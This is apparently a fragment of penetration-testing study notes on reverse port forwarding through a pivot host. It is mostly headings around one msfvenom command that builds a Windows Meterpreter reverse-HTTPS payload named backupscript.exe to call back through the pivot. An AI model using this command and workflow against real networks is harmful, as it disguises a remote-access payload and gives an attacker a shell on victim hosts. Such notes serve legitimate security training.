Reverse Port Forwarding
Sample Scenario

Creating a payload using MSFVenom
$ msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080Using multi/handler in MSFConsole
Transferring the payload to the Pivot Host
Starting Web Server on Pivot Host
Download the File on the Victim Host
Using SSH -R in our Attacker Machine

Using meterpreter's portfwd
Configuring and starting multi/handler
Last updated